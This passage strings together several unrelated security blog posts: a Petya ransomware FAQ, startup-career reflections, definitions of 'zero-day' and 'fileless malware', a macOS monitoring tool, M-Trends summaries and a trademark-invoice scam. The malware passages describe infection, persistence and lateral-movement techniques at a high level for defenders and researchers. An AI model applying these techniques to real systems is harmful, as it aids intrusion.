  • Perform an inventarisation of administrative credentials to identify if there are passwords shared between multiple machines. If this is the case, the systems which can be accessed using these administrative credentials are vulnerable to one of the spreading and infection methods used by the malware.
    • The most important accounts to focus on during this inventarisation are accounts with elevated privileges such as local Administrator accounts and  domain accounts with local administrator privileges.

It is important to consider that the infection, privilege escalation and lateral movement techniques used by the Petya malware are also frequently used during penetration testing on internal networks. It is therefore advised to review previous reports that followed internal penetration tests to get a quick overview of relevant vulnerabilities and to ensure that penetration tests on the internal networks are performed periodically.

Q6 We have infected machines what can we do to recover them? Should we pay the ransom?
A The email address that was used by the attackers to receive payments and release decryption keys has been blocked by the email provider. This makes it impossible for the actor(s) behind the Petya malware to confirm the payments and return the decryption keys to its victims. It is therefore not recommended to pay the ransom of $300 (or the equivalent in the Bitcoin currency) as requested by the malware authors.

Please note that after a system is infected, the malware attempts to spread before it is rebooted and the encryption process is started. Consequently, if a system is infected with Petya, but has not yet been rebooted or the fake CHKDSK process has not been completed, it may still prove possible to (partially) recover data from the infected system.

Q7 Do you know anything about the target of the Petya attack or the actors behind it?
A One of the few confirmed facts is that initially infections occurred due to an infected update from the Ukraine based company M.E.Doc. The software of this company is both broadly and mostly used by organizations in the Ukraine. These organizations within the Ukraine were thus initially targeted by the Petya attack.

This fact, combined with some of the characteristics of the attack, have led to extensive speculation in regard to the actors behind the attack (of which the grugq provides an extensive overview). However, at the moment there is no definitive public evidence to attribute the attack to a specific actor. The investigation into the purpose of the attack and the actors behind the attack are still being actively investigated by Fox-IT and many others.

Q8 How does the Petya attack differ from the Wanacry/Wannacrypt attack?
A This Petya attack seems to be more targeted than Wanacry. While WanaCry included functionality to scan for vulnerable systems on the Internet, the Petya attack primarily targets other systems within the restricted IP spaces of affected networks.
One of the few similarities between Petya and Wanacry concerns the usage of the SMB exploit EternalBlue, which is an exploit that was originally used by the NSA and was subsequently leaked by the Shadow Brokers. This is the only spreading vector of Petya which can be stopped and prevented by installing the MS17-010 patch. The other spreading vectors cannot be fully reduced by patching the systems, although installing the KB2871997 patch can reduce the impact of the other spreading vector.

In addition to EternalBlue, Petya includes further methods for spreading using lateral movement techniques such as credential re-use, PSEXEC and WMI. These techniques, which are often used in manual attacks by advanced attackers as well as during penetration tests on internal networks, have now been adapted and incorporated into an automated attack by the attackers in the Petya malware.

In regards to the encryption of the files Petya and Wanacry differ in the way that the system is rendered inoperable. Petya, in addition to encrypting individual files also encrypts critical operating system components thereby rendering the system inoperable after a reboot. The encryption of the individual files differs due to the way that the files are encrypted as well as the file types that are targeted.

Q9 I have heard rumors about an antidote or kill switch, is this true?
A Petya does not have a remote killswitch in the same way as was present in Wanacry. That is, there is no universal way to stop all Petya infections from occurring. A more limited and local way to prevent the Petya malware from spreading does exist, which is also referred to as a “killswitch” or an “antidote”.

This local antidote involves placing a file called “perfc” or “perfc.dat” in the C:\Windows directory. The reason why this works is because Petya checks if that file exists before infecting a vulnerable system. If the file exists, Petya won’t infect the system. Please note that Petya actually checks for a file with the same name as the filename that it was started from. So if the Petya file is renamed to “example.dll”, subsequent variants of that strain of the Petya malware will actually check if C:\Windows\example” exists, instead of “perfc”. It just so happens to be that “perfc” is the filename of the main variant that’s currently spreading.

Q10 Are the patches for Wanacry and Petya automatically installed by Windows Update?
A On supported operating systems the patch can be installed through the Windows update mechanism. If Windows update has been configured to update automatically, these systems should have been updated with MS17-010 several months ago. However, this is not the case on unsupported operating systems such as Windows 2003, XP and 8. Microsoft has released patches for these operating systems that need to be downloaded and applied manually.

Q11 Will Petya encrypt network drives as well?
A In the regular file encryption part of Petya, it will try and encrypt files on every disk drive available to the victim machine. Notably, it will only encrypt local hard drives, and not network drives that are mounted as a hard drive. It does this by checking which type of drive it is, and only encrypt drives that is a fixed media, for example a hard disk drive or flash drive.

What’s It Like to Join a Startup’s Executive Team?

Startups are the innovation engine of the high-tech industry. Those who’ve participated in them have experienced the thrill and at times the disappointment of navigating uncharted territories of new ideas. Others have benefited from the fruits of these risk-takers’ labor by using the products they created.

What’s it like to contribute at an early stage of a startup? Below are my reflections on the first few months I’ve spent at Minerva so far. I joined this young endpoint security company as VP of Products not too long ago (and I’m loving it). I’ve outlined some takeaways in a generalized form that might benefit others in a similar position or those that are curious about entrepreneurial environments.

Situational Awareness: Where Am I?

When you come into a company—large or small—you already have some idea regarding the type of the organization you’re joining. Your understanding is incomplete at best. After all, it’s is based on your perspective as an outsider, and is informed mainly by the company’s official external communications (website, brochures, job posting) and the interactions you’ve had during the interviewing process.

Of course, you’ll learn as much as you can about the firm before deciding to come on board; validate all your assumptions and fill in the gaps in your understanding after starting the job:

  • If the company is small, this quite literally means taking the time to speak with as many of your new colleagues as possible, not only to start getting to know them, but also to understand their perspective on the company’s successes and challenges. Who are these individuals, what do they do, and how might you be of help?
  • Similarly, talk to the board members: What are they most excited about? What are their biggest concerns? What do they expect of you? In what ways might they be able to help you in meeting those objectives, on the basis of their expertise and connections? How involved do they want to be in the company’s operations and your activities?
  • In addition, understand the mindset of the company’s customers and partners. What do they appreciate the most about the firm? Where do they see opportunities for improvements? How do they collaborate with the company today? How might you assist them in the short and long term? Where might they help you?

At this initial stage on your involvement with the company, you still have the benefit of easily asking questions that later might sound silly. At the moment, it’s also easier to let yourself say “I don’t know, but I’ll find out” when you face a question you cannot answer. You’re gaining situational awareness, starting to understand your tools and priorities, getting to know the people, and adjusting the mental model you’ve built while you were still an outsider to the firm.

I had the benefit of participating in Minerva’s Advisory Board prior to becoming an employee. This allowed me get to know some of my future colleagues and confirm that we’ll get along, as well as to make sure that we’re aligned on the company’s direction. Still, only after spending several weeks immersed in the company’s day-to-day activities did I truly begin to feel like I knew where I was and I was doing there.

Takeaways: It takes longer than you might expect to feel fully engaged and productive with the new team. Do your research beforehand, but accept that you can only see a sliver of the actual company. Interact with others as much as possible, but leave time for reflection.

Self-Discovery: Who Are We?

If you’re joining a startup’s executive team, there’s a good chance that it’s entering a new phase of its life cycle. In the case of Minerva, I came on board as the company was preparing to enter the US market. It was starting to build a sales force and formalize its go-to-market strategy. The firm has been in existence for three years by that time, which allowed it to build the underlying framework and several product components. It gained feedback from early customers, assembled the R&D team and was ready to make itself known to the world.

After establishing an executive team, the startup will likely be looking to learn from its experiences so far and determine the direction for the next stage of its development. Since you’re new to the effort, you’ll need to begin by learning about colleague’s impressions and ideas before voicing your own. However, don’t wait too long before sharing your opinions. For the next few weeks you still have the fresh perspective that allows you to empathize with outsiders—customers, analysts, partners, investors—in a way that’s very difficult to do once you’ve formally integrated into the collective.

Lots of frameworks exist for helping you and other members of the executive team determine the business strategy. You can start with SWOT analysis, which, as Wikipedia summarizes, encourages you to understand the following aspects of your firm:

  • Strengths: characteristics of the business … that give it an advantage over others
  • Weaknesses: characteristics of the business that place [it] at a disadvantage relative to others
  • Opportunities: elements in the environment that the business … could exploit to its advantage
  • Threats: elements in the environment that could cause trouble for the business”

If, like me, you are focused on product management, you might benefit from my Product Management Framework for Creating Security Products, which recommends asking and answering the following questions:

It will likely take many brainstorming sessions, informal conversations, emails and adviser interactions to understand and verbalize the way in which your solution is related to other products your ecosystem. What problems are you solving and, most importantly, what are you not trying to tackle? What’s your competition? Why should customers care about you? What will industry analysts think?  Once you’ve figured this out, know you’ll need to adjust as the company and the market evolves.

As with any self-reflective experience, determining who you are and how you hope to be perceived by others is both challenging and exhilarating. Engaging in this exercise forces you to ask tough questions about yourself. You also need to tap into your inner optimist to envision a future in which you’ll succeed despite, or perhaps because, of the challenging road ahead.

In the case of Minerva, the company developed a unique way of combating evasive malware. However, having a strong technological base alone is insufficient: we needed to determine how to explain not only what we do, but why customers would benefit from the solution in a way that they cannot with the existing security layers. How are we related to baseline anti-malware tools? What about the “next-gen” players? (For more on this, see my Questions for Endpoint Security Startups post.)

Takeaways: Harness the external perspective you have after just joining the firm to introduce new ideas and challenge the old ones. Recognize that marketing and management frameworks are just suggestions for how to devise a business strategy. Be realistic about market dynamics and possibilities, but remember the need to stay optimistic when embarking upon new ventures.

External Communication

Once you understand where you are and who your company is, you’re ready to explain this to others. That means making your presence known in the targeted markets, as you begin to fill the sales pipeline and close deals, and as you continue to develop your product. You’re not only interacting with prospective customers directly, but are also working with industry analysts and other influences, educating them about your existence and value proposition, and soliciting feedback regarding the vision for your product.

Your company probably has a budding sales force, which you need to equip with the tools they’ll use when explaining the value of your solution. Depending on your specific role, you might be tasked with creating, contributing, or providing feedback on internal documentation that summarizes the results of the earlier self-discovery process to keep everyone in the company informed and marching to the same beat. Ditto for external-facing collateral, such as the company’s website contents, brochures, whitepapers, etc. Much of the documents the company developed in its earlier stages might need to be revised, retired or expanded.

External communications are about persuasion: you need to convince others to pay attention to your ideas and solutions, which often entails changing their perspective and challenging their assumptions.

You’re passionate about the benefits of your technology; yet, organizations are cautious of newcomers. Moreover, the market is dominated by the rhetoric of the incumbents, which requires the new entrants to clearly articulate how they fit into the existing marketplace and educate prospects about seeing through the marketing hype. To be heard, a young company must engage in persuasive communications as it builds up its core customer base and establishes a reputation. As a member of the executive team, it’s up to you to make this happen.

As I write this, Minerva just announced the closing of a Series A funding round. Encouraged by the enthusiasm of early adopters and the feedback from prospects, we established a sales team, formalized product roadmap plans, and updated the company’s marketing collateral. A lot of my time is spent speaking with prospects, customers, analysts, partners and, of course, colleagues, in addition to continuing to enhance the product.

Takeaways: Understanding your product’s value and your company’s strategy is only part of the battle. Persuading others to support you in this endeavor requires lots of external communications (see How to Be Heard in IT Security and Business). Be ready to spend lots of time writing papers, creating and editing slide decks, drafting and answering emails, speaking on the phone and meeting with people one-on-one and at industry events. And continue to deliver upon product roadmap commitments.

Disambiguate “Zero-Day” Before Considering Countermeasures

“Zero-day” is the all-powerful boogieman of the information security industry. Too many of us invoke it when discussing scary threats against which we feel powerless. We need to define and disambiguate this term before attempting to determine whether we’ve accounted for the associated threats when designing security programs.

Avoid Zero-Day Confusion

I’ve seen “zero-day” used to describe two related, but independent concepts. First, we worry about zero-day vulnerabilities—along with the associated zero-day exploits—for which we have no patch. Also, we’re concerned about zero-day malware, which we have no way of detecting.

These scenarios can represent different threats that often require distinct countermeasures. Let’s try to avoid confusion and FUD by being clear about the type of issues we’re are describing. To do this, in short:

Use “zero-day” as an adjective. Don’t use it as a noun.

This way you’ll be more likely to clarify what type of threat you have in mind.

The term zero-day (sometimes written as “0day”) appears to originate from the software pirating scene, as @4Dgifts pointed out to me on Twitter. It referred to cracked software (warez) distributed on or before its official release date; this is outlined on Wikipedia. By the way, if you like leetspeak, writing “0day” is fine when addressing technologists; stick to “zero-day” if your audience includes executives or business people.

Zero-Day Vulnerabilities and Exploits

Let’s start with zero-day vulnerabilities. I came across the following reasonable definition of this term in FireEye’s Zero-Day Danger report, which is consistent with how many other security vendors use this term:

“Zero-day vulnerabilities are software flaws that leave users exposed to cyber attacks before a patch or workaround is available.”

Along these lines, a zero-day exploit is one that targets a zero-day vulnerability.

An alternative definition of a zero-day exploit, which was captured by Pete Lindstrom, is “an exploit against a vulnerability that is not widely known.” (Thanks for pointing me to that source, Ryan Naraine.)

Zero-Day Malicious Software

I’ve encountered numerous articles that ask “What is zero-day malware?” and then confuse the matter by proceeding to discuss zero-day exploits instead. Even FireEye’s report on zero-day vulnerabilities, mentioned above, blurred the topic by briefly slipping into the discussion of zero-day malware when it mentioned that “code morphing and obfuscation techniques generate new malware variants faster than traditional security firms can generate new signatures.”

To avoid ambiguity or confusion, I prefer to use the term zero-day malware like this:

Zero-day malware is malicious software for which there is no currently-known detection pattern.

The word “pattern” includes the various ways in which one might recognize a malicious program, be it a traditional signature, a machine learning model, or behavioral footprints. I think this definition is consistent with the type of malware that Carl Gottlieb had in mind during our discussion on Twitter malware variants that don’t match a known identifier, such as a hash.

Zero-Day Attacks

Another “zero-day” term that security professionals sometimes use in this context is zero-day attack. Such an assault is reasonably defined Leyla Bilge and Tudor Dumitras in their Before We Knew It paper:

“A zero-day attack is a cyber attack exploiting a vulnerability that has not been disclosed publicly.”

However, what if the attack didn’t involve zero-day vulnerabilities, but instead employed zero-day malware? We’d probably also call such an incident a zero-day attack. Ambiguity alert!

Unless you need to be general, consider staying away from “zero-day attack” and clarify which of zero-day concept you’re discussing.

Avoid the Ambiguity, Save the World

Why worry about “zero-day” terminology? There is an increasingly-acute need for infosec designs that account for attacks that incorporate unknown, previously-unseen components. However, the way organizations handle zero-day exploits will likely differ from how they deal with zero-day malware.

By using the “zero-day” as an adjective and clarifying which word it’s describing, you can help companies devise the right security architecture. In contrast, asking “What is zero-day?” is too ambiguous to be useful.

As I mentioned when discussing fileless malware, I am especially careful with terms that risk turning into industry buzzwords. My endpoint security product at Minerva focuses on blocking unknown malware that’s designed to evade existing defenses, and I want to avoid misrepresenting our capabilities when using the term zero-day. Perhaps this write-up will help my company and other security vendors better explain how we add value to the security ecosystem.

The History of Fileless Malware – Looking Beyond the Buzzword

What’s the deal with “fileless malware”? Though many security professionals cringe when they hear this term, lots of articles and product brochures mention fileless malware in the context of threats that are difficult to resist and investigate. Below is my attempt to look beyond the buzzword, tracing the origins of this term and outlining the malware samples that influenced how we use it today.

Frenzy for Fileless

The notion of fileless malware has been gaining a lot of attention at industry events, private meetings and online discussions. This might be because this threat highlights some of the deficiencies in old-school endpoint security methods and gives new approaches an opportunity to highlight their strengths.

Indeed, according to Google Trends, people’s interest in this term blipped in 2012 and 2014, began building up toward 2015 and spiked in 2017.

This pattern corresponds to the publicly-discussed malware that exhibited “fileless” capabilities in the recent years, and with the burst of research and marketing publications that appeared in 2017.

What is Fileless Malware?

Let’s get this out of the way: Fileless malware sometimes has files. Most people today seem to be using the term fileless malware in a manner consistent with the following definition:

Fileless malware is malware that operates without placing malicious executables on the file system.

This definition accommodates situations where the infection began with a malicious script or even a benign executable on the file system. It also matches the scenarios where the specimen stored artifacts in the registry, even though Windows keeps registry contents on disk. It applies regardless of the way in which the infection occurred, be it an exploit of a vulnerability, a social engineering trick, or a misuse of some feature.

Though initially fileless malware referred to malicious code that remained solely in memory without even implementing a persistence mechanism, the term evolved to encompass malware that relies on some aspects of the file system for activation or presence. Let’s review some of the malicious programs that influenced how we use this term today.

2001-2003: Code Red and SQL Slammer

The notion of malicious code that resides solely in memory certainly existed prior to the 21st century. Yet, it wasn’t until the highly-prolific Code Red worm left its mark on the Internet in 2001, did the term fileless malware enter the general parlance. The earliest public reference I could find dates to summer 2001, when Kaspersky Labs published an announcement that quoted none other than Eugene Kaspersky:

“We predict that in the very near future, such ‘fileless’ worms as Code Red will become one of the most widespread forms of malicious programs, and an anti-virus’ ineffectiveness in the face of such a threat simply invites danger.”

Code Red exploited a vulnerability in Microsoft IIS web servers, remaining solely in memory of the infected host, as explained by the Center for Applied Internet Data Analysis.

A year and a half later another worm—SQL Slammer—spread like wildfire by exploiting a vulnerability in Microsoft SQL servers. Robert Vamosi, writing for ZDNet in 2003, described this malware as “file-less” and mentioned that it resided “only in memory, much as Code Red.”

I came across another early mention of this term in the 2003 patent filing by the venerable Peter Szor, who worked at Symantec at the time. Titled signature extraction system and method, the patent defines fileless malware as:

“Malicious code that is not file based but exists in memory only… More particularly, fileless malicious code … appends itself to an active process in memory…”

The original definition of fileless malware was close to the English meaning of the words that describe malware that remains active without leaving any files.

2012: A Bot That Installed the Lurk Trojan

The next fileless malware reference I could locate appeared nearly a decade after Code Red and SQL Slammer worms. In 2012, Sergey Golovanov at Kaspersky Labs presented his analysis of a bot that didn’t save any files to the hard drive, explaining that:

“We are dealing with a very rare kind of malware — the so-called fileless malicious programs that do not exist as files on the hard drive but operate only in the infected computers RAM.”

The unnamed specimen exploited a client-side Java vulnerability and operated solely in memory of the affected javaw.exe process. Sergey mentioned that the bot was capable of installing the Lurk banker trojan.

Earlier that year, Amit Malik at SecurityXploded published an educational write-up, explaining how to achieve “in-memory or file-less execution” of a Windows program without saving it to disk after downloading it from the Internet.

2014: Powerliks, Angler, Phase Bot

The malicious programs outlined above stayed purely memory-resident without leaving any direct footprints on the file systems. As the result of this volatility, they disappeared once the system was rebooted. In contrast, 2014 brought us Poweliks malware, which G Data described as “persistent malware without a file.” This specimen found its way onto the system by exploiting a Microsoft Word vulnerability. It used PowerShell and JavaScript along with shellcode to jumpstart its in-memory execution.  Kevin Gossett at Symantec described its persistence mechanism like this:

“Normally, malware will place an entry in the Run subkey that points to a malicious executable which is then executed. Poweliks makes the Run subkey call rundll32.exe, a legitimate Windows executable used to load DLLs, and passes in several parameters. These parameters include JavaScript code that eventually results in Poweliks being loaded into memory and executed”

A month later, security researcher Kafeine documented an Angler exploit kit infection that exhibited fileless characteristics. The attack targeted a client-side Java vulnerability and operated solely in memory of the affected javaw.exe process. In a related future occurrence, Angler began installing Bedep downloader in 2016 that, according to Palo Alto’s Brad Duncan, “is installed without creating any files because it is loaded directly into memory by the exploit shellcode.”

Closer to the end of 2014, security researcher MalwareTech documented a fileless rootkit named Phase Bot. According to its advertisement, the specimen achieved stealth “by installing on windows systems without dropping any files to disk and not having it’s own process. […] Phase hids it’s relocatable code encrypted in the registry and uses powershell to read and execute this position independent code into memory.” Like Powerliks, this malware maintained persistence by launching rundll32.exe from an autorun registry key to execute JavaScript.

2014-2015: Duqu 2.0, Kovter

In mid-2015, Kaspersky Labs published details about an advanced adversary that operated in 2014-2015 using a sophisticated malware platform that the vendor called Duqu 2.0. The attack utilized a Windows vulnerability to install stealthy malware that remained solely in memory of the infected host. It did not implement a persistence mechanism. Instead, the researchers explained, the attackers targeted servers with high uptime and then re-infected the systems that got “disinfected by reboots.”

Another fileless malware specimen that gained attention in 2015 was Kovter. In that incarnation, the Kovter’s infection technique closely resembled that of Powerliks. Even when starting the infection with a malicious Windows executable, the specimen removed that file after storing obfuscated or encrypted artifacts in the registry. At least one of its variations maintained persistence by using a shortcut file that executed JavaScript. As outlined by Andrew Dove at Airbus, this script launched PowerShell, which executed shellcode, which launched a non-malicious application after injecting malicious code into it.

2016: PowerSniff, PowerWare, August

In mid-2016, Josh Grunzweig and Brandon Levene at Palo Alto Networks documented a malicious program they dubbed PowerSniff. The infection began with a Microsoft Word document that contained a malicious macro. The in-memory mechanics of this specimen resembled some aspects of Kovter and involved a PowerShell script that executed shellcode, which decoded and executed additional malicious payload, operating solely in memory. PowerSniff had the ability to temporarily save a malicious DLL to the file system.

A couple of weeks later, Mike Sconzo and Rico Valdez at Carbon Black described a ransomware specimen they called PowerWare. Like PowerSniff, PowerWare began its infection with a Microsoft Office document that contained a malicious macro, which ultimately launched PowerShell that continued the infection process without placing malicious executables on the file system.

Another fileless malware sample that utilized Microsoft Word macros and PowerShell was documented later in the year by Proofpoint. It was named August. According to the researchers, the specimen downloaded a portion of a payload “from the remote site as a PowerShell byte array,” executing it in memory without saving it to the file system.

2017: POSHSPY, etc.

In early 2017, Kaspersky Labs described an unnamed incident where adversaries stored Meterpreter-based malicious code solely in memory. The only file system artifacts were legitimate Windows utilities such as sc (to install a malicious service that ran PowerShell) and netsh (to tunnel malicious network traffic).

Several months later, Matthew Dunwoody at Mandiant described another sophisticated attack that involved fileless malicious code. Named POSHSPY, the specimen used Windows Management Instrumentation (WMI) capabilities of the OS to maintain persistence and relied on PowerShell for its payload. The specimen had the ability to download executable files, which it would save to the file system. Matthew concluded that:

By “living off the land,” this adversary implemented “an extremely discrete backdoor that they can deploy alongside their more conventional and noisier backdoor families, in order to help ensure persistence even after remediation.”

The incidents above highlighted the powerful capabilities available to intruders even when they rely solely on built-in benign programs to execute malicious payload on the infected systems.

Alternatives to Saying “Fileless Malware”

Sergey Golovanov’s 2012 article mentioned above originally used the term fileless malware. Interestingly, it has been revised and now uses the term bodiless malware instead. Kaspersky Labs experimented with saying bodiless malware as late as 2016, but it seems to have returned to fileless malware in other writeups in 2017.

Speaking of the terms that didn’t take off… The notion of Advanced Volatile Threat (AVT) gained some buzz in 2013 after, according to Wikipedia, being coined by John Prisco of Triumfant Inc. The short-lived AVT moniker popped up in Byron Acohido’s USA Today article in 2013 in reference to a backdoored version of Apache software. According to Pierre-Marc Bureau, who was at ESET at that time, the backdoor left “no traces of compromised hosts on the hard drive other than its modified” web server binary.

In contrast, a reasonable alternative to the term fileless malware was introduced by Carbon Black in its 2016 Threat Report. The report used the phrase non-malware attacks. Writing on the company’s blog a few months later, Michael Viscuso explained the meaning of this term like this:

“A non-malware attack is one in which an attacker uses existing software, allowed applications and authorized protocols to carry out malicious activities. Non-malware attacks are capable of gaining control of computers without downloading any malicious files, hence the name. Non-malware attacks are also referred to as fileless, memory-based or ‘living-off-the-land’ attacks.”

Gartner used the term “non-malware attack” in a 2017 report that highlighted Carbon Black. However, another Gartner report published a month later used “fileless attacks” instead.

Why Does It Matter?

I like the idea of saying “non-malware attacks” for incidents that rely solely on legitimate system administration tools and other non-malicious software. This is the scenario that some people describe as living-off-the-land. In contrast, I might prefer to say “memory-only malware” if I need to point out that malicious code is never saved to disk, perhaps because it was injected into another process. I’m even OK with saying “fileless malware” when bringing focus on persistence mechanisms that avoid placing traditional executables on the file system.

Unfortunately, nowadays the terminology has been commingled, and we’re probably stuck with the term “fileless malware” to describe the various scenarios outlined above, despite the term’s ambiguity. Alas, human language is imprecise and always-evolving. (If we all spoke C#, perhaps the world would be a better place.)

I care about this terminology because I’m trying to avoid buzzwords and empty phrases when describing the capabilities of the anti-malware product for which I’m responsible at Minerva. It runs alongside other endpoint security tools and blocks all sorts of sneaky malware, regardless whether its payload touches disk. I’m often asked how we handle fileless malware; I decided to perform the research above to better understand how and when I should use this term.

Introducing for macOS

UPDATE (April 4, 2018): now supports macOS 10.13.

As a malware analyst or systems programmer, having a suite of solid dynamic analysis tools is vital to being quick and effective. These tools enable us to understand malware capabilities and undocumented components of the operating system. One obvious tool that comes to mind is Procmon from the legendary Sysinternals Suite from Microsoft. Those tools only work on Windows though and we love macOS.

macOS has some fantastic dynamic instrumentation software included with the operating system and Xcode. In the past, we have used dynamic instrumentation tools such as Dtrace, a very powerful tracing subsystem built into the core of macOS. While it is very powerful and efficient, it commonly required us to write D scripts to get the interesting bits. We wanted something simpler.

Today, the Innovation and Custom Engineering (ICE) Applied Research team presents the public release of for macOS, a simple GUI application for monitoring common system events on a macOS host. captures the following event types:

  • Process execution with command line arguments
  • File creates (if data is written)
  • File renames
  • Network activity
  • DNS requests and replies
  • Dynamic library loads
  • TTY Events identifies system activities using a kernel extension (kext). Its focus is on capturing data that matters, with context. These events are presented in the UI with a rich search capability allowing users to hunt through event data for areas of interest.

The goal of Monitor is simplicity. When launching Monitor, the user is prompted for root credentials to launch a process and load our kext (don’t worry, the main UI process doesn’t run as root). From there, the user can click on the start button and watch the events roll in!

The UI is sparse with a few key features. There is the start/stop button, filter buttons, and a search bar. The search bar allows us to set simple filters on types of data we may want to filter or search for over all events. The event table is a listing of all the events Monitor is capable of presenting to the user. The filter buttons allow the user to turn off some classes of events. For example, if a TimeMachine backup were to kick off when the user was trying to analyze a piece of malware, the user can click the file system filter button and the file write events won’t clutter the display.

As an example, perhaps we were interested in seeing any processes that communicated with We can simply use an “Any” filter and enter xkcd into the search bar, as seen in Figure 1.

Figure 1: User Interface

We think you will be surprised how useful Monitor can be when trying to figure out how components of macOS or even malware work under the hood, all without firing up a debugger or D script.

Click here to download Please send any feature requests/bugs to

Apple, Mac and MacOS are registered trademarks or trademarks of Apple Inc.

M-Trends 2017: A View From the Front Lines

Every year Mandiant responds to a large number of cyber attacks, and 2016 was no exception. For our M-Trends 2017 report, we took a look at the incidents we investigated last year and provided a global and regional (the Americas, APAC and EMEA) analysis focused on attack trends, and defensive and emerging trends.

When it comes to attack trends, we’re seeing a much higher degree of sophistication than ever before. Nation-states continue to set a high bar for sophisticated cyber attacks, but some financial threat actors have caught up to the point where we no longer see the line separating the two. These groups have greatly upped their game and are thinking outside the box as well. One unexpected tactic we observed is attackers calling targets directly, showing us that they have become more brazen.

While there has been a marked acceleration of both the aggressiveness and sophistication of cyber attacks, defensive capabilities have been slower to evolve. We have observed that a majority of both victim organizations and those working diligently on defensive improvements are still lacking adequate fundamental security controls and capabilities to either prevent breaches or to minimize the damages and consequences of an inevitable compromise.

Fortunately, we’re seeing that organizations are becoming better are identifying breaches. The global median time from compromise to discovery has dropped significantly from 146 days in 2015 to 99 days 2016, but it’s still not good enough. As we noted in M-Trends 2016, Mandiant’s Red Team can obtain access to domain administrator credentials within roughly three days of gaining initial access to an environment, so 99 days is still 96 days too long.

We strongly recommend that organizations adopt a posture of continuous cyber security, risk evaluation and adaptive defense or they risk having significant gaps in both fundamental security controls and – more critically – visibility and detection of targeted attacks.

On top of our analysis of recent trends, M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year. FaaS monitors organizations 24/7, which gives them a unique perspective into the current threat landscape. Additionally, this year we partnered with law firm DLA Piper for a discussion of the upcoming changes in EMEA data protection laws.

You can learn more in our M-Trends 2017 report. Additionally, you can register for our live webinar on March 29, 2017, to hear more from our experts.

Joining Minerva Labs to Keep Malware in Check

As much as I look forward to change sometimes, I am often hesitant to forego the familiar despite recognizing the risks of becoming too comfortable in the same job. Fortunately, I’ve come across an opportunity to take on a new role that matches all three professional objectives I defined for myself:

  • Contribute towards advancing the practice of information security.
  • Grow commercial businesses whose value is tied to securing information.
  • Help organizations in their fight against malicious software.

I’m joining a young anti-malware company Minerva Labs as VP of Products. I’m taking on this role not only because it’ll allow me to curtail the effectiveness of malware on endpoints, but also because I love the character and ingenuity of the people that built Minerva. The position will allow me to continue teaching malware analysis at SANS Institute and maintain the REMnux toolkit, which is consistent with the above-mentioned objectives.

Why Minerva Labs?

Minerva’s underlying technology is focused on controlling how malware perceives its reality. What if you could fool malware into thinking it’s running in an analysis sandbox, causing it to stop executing to avoid revealing its true nature? What if you could make ransomware believe it’s encrypting files while blocking the encryption and backing up the user’s files? What if you could simulate the presence of infection markers that malware checks to avoid infecting the system twice?

I’ve written about similar ideas before (immunization, ransomware), yet dreaming up ideas is the easy part. The folks at Minerva actually managed to create products that make it feasible to employ such deception-based approaches in the real world. I’m joining them to continue evolving this platform and the technologies that could be built upon it.

I was also impressed by Minerva’s attention to the practicality of deploying their products in production. Extremely lightweight agent; no reboots to install or upgrade; no irrelevant alerts. Strengthen the  security architecture without expecting the enterprise to overhaul it. Not only work alongside existing anti-malware solutions, but also help them reach their full potential.

Oops, is this starting to sound like a sales pitch? Sorry, I felt inclined to explain my reasons and share my excitement about this step in my professional journey. It’s kind of a big deal.

Getting to Know Minerva

By the way, Eddy Bobritsky, Minerva’s CEO, recently participated in the Startup Security Weekly podcast. This interview, which you can watch below, explains Minerva’s objectives and gives you a chance to hear from some of the people behind the company.

If you are working to better protect your organization’s systems and have a wish-list for ideas you’d like to see in an anti-malware solution, let me know. What would you like to see in an innovative endpoint security product? What’s your take on the way Minerva positions its approach? I’d love to hear your thoughts. Also, if you want to get to take a closer look at our products, I’ll be glad to schedule a discussion and arrange a demo.


Reflections of a Security Professional: Podcast Interview

Life rushes forward at the speed of a bullet train. I struggle finding the time to pause and reflect upon the journey travelled and the direction in which I’m heading. Fortunately, I had the opportunity to consider key moments in my professional endeavours so far during the interview that Doug Brush conducted with me for the Cyber Security Interviews podcast.

If you’d like to know what events and decisions have affected my career to date, you might find this interview of interest. You’ll learn a bit about me and also hear what I’ve learned along the way.

You can listen to the interview using the embedded player below or at the official podcast page:


The topics we covered during the conversation include:

  • Getting started and making progress in information security
  • The need for business, communication and other non-techie skills
  • The role of professional certifications and formal education
  • The challenges of seeking advice and learning from failures
  • Being inspired by, interacting with, and learning from others

I found the interview strangely therapeutic and enjoyed talking about myself for a change :-) But beyond it being all about me, me, me, perhaps other members of the community might benefit from the experiences I shared during the conversation. Thanks, Doug, for taking the interest in speaking with me.

M-Trends Asia Pacific: Organizations Must Improve at Detecting and Responding to Breaches

Since 2010, Mandiant, a FireEye company, has presented trends, statistics and case studies of some of the largest and most sophisticated cyber attacks. In February 2016, we released our annual global M-Trends® report based on data from the breaches we responded to in 2015. Now, we are releasing M-Trends Asia Pacific, our first report to focus on this very diverse and dynamic region.

Some of the key findings include:

  • Most breaches in the Asia Pacific region never became public. Most governments and industry-governing bodies are without effective breach disclosure laws, although this is slowly changing.
  • The median time of discovery of an attack was 520 days after the initial compromise. This is 374 days longer than the global median of 146 days.
  • Mandiant was engaged by many organizations that have already conducted forensic investigations (internally or using third parties), but failed to eradicate the attackers from their environments. These efforts sometimes made matters worse by destroying or damaging the forensic evidence needed to understand the full extent of a breach or to attribute activity to a specific threat actor.
  • Some attacker tools were used to almost exclusively target organizations within APAC. In April 2015, we uncovered the malicious efforts of APT30, a suspected China-based threat group that has exploited the networks of governments and organizations across the region, targeting highly sensitive political, economic and military information.

Download M-Trends Asia Pacific to learn more.

Misleading Trademark Registration Invoices and Scams

Miscreants are attracted to law-skirting schemes that generate strong revenues without significant ongoing investments. You can observe these characteristics in the trademark registration campaign described below. It seems to have been active for at least a decade and spans Texas, Delaware, Washington and the Principality of Liechtenstein. This is a manifestation of the broader set of fake invoice scams, such is the website backup “invoices” that I outlined in an earlier article.

Protected Trademarks on the Internet

After I registered the name of the malware analysis toolkit that I maintain, REMnux, as a trademark with the US Patent and Trademark Office, I began receiving postal solicitations requesting that I include this trademark in various private registries. You can see one of these letters below. (Click the image to see the PDF of the full page.)

The letter looks like an official invoice for trademark registration. In reality, the solicited $992 fee is for the proposed “service” that the notice describes in all capital letters as follows:



Buried in the paragraph that describes the offer is the phrase “THIS PUBLICATION IS AN ELECTIVE SERVICE WHICH NEITHER SUBSTITUTES THE REGISTRATION… WITH U.S.P.T.O.” So, the letter does indicate that it’s not associated with the US Patent and Trademark Office. Unfortunately, plenty of its recipients don’t look closely at what they assume are bills, and probably pay what they believe is an official trademark registration invoice.

Send This Stub With Check in the Remittance Envelope

